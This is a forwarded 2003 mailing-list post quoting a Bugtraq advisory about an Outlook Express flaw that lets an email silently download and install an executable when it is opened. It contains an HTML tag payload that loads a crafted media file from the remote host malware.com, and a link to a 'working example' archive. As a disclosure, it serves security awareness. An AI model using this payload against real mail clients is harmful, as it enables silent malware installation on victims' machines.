[NBLUG/talk] OT: [Fwd: Restricted Zone: the OUTLOOK EXPRESS]

ME dugan at passwall.com
Wed May 21 10:35:01 PDT 2003

Yet another reason to avoid MS products like "Look Out!" Express.

Subject: Restricted Zone: the OUTLOOK EXPRESS
From:    "http-equiv at excite.com" <1 at malware.com>
Date:    Wed, May 21, 2003 4:55
To:      bugtraq at securityfocus.com
         NTBugtraq at listserv.ntbugtraq.com

Tuesday, 20 May, 2003

Silent delivery and installation of an executable on a target
computer. No client input other than opening an email or newsgroup  post.

This can be achieved with the default setting of Outlook Express:
RESTRICTED ZONE.

Technically the following never worked, cannot work, shouldn't work.  But
it does:

<head><style>
<t:audio  t:src="http://www.malware.com/freek.asf"  />

What that does is invoke our freakish media file including our trusty  and
battle-hardened 0s URL flip from within the html of an email or  newsgroup
post on viewing, which ordinarily could never be done.

But it now appears that while custom-crafted media files fail,
modified third-party files [whatever that means] function according  to
plan. Specifically audio + *.asf. Our 0s URL flip points to our  file on
the remote server and automatically forces our download as  instructed.
Couple that with the most recent flood-like functionality  of the iframe:
http://www.securityfocus.com/archive/1/321662 and
that's the end of that.

Tested on:

Outlook Express 6.00.2800.1123 and all of its 'patches'
with WMP 7.01.00.3055 and 8.00.00.4487 [WMP 9 fails]

First Step Working Example:

http://www.malware.com/but.its.free.zip

Notes:

1. this is reminiscent of GreyMagic Software's 'Qualcomm Eudora
WebBrowser Control Embedded Media Player File Vulnerability ':
http://www.securityfocus.com/bid/4343 which appears to never have  been
patched.

2. disable scripting in the media player [if it helps]

3. do not be lured into opening email and newsgroup posts from
untrustworthy sources

End Call

--
http://www.malware.com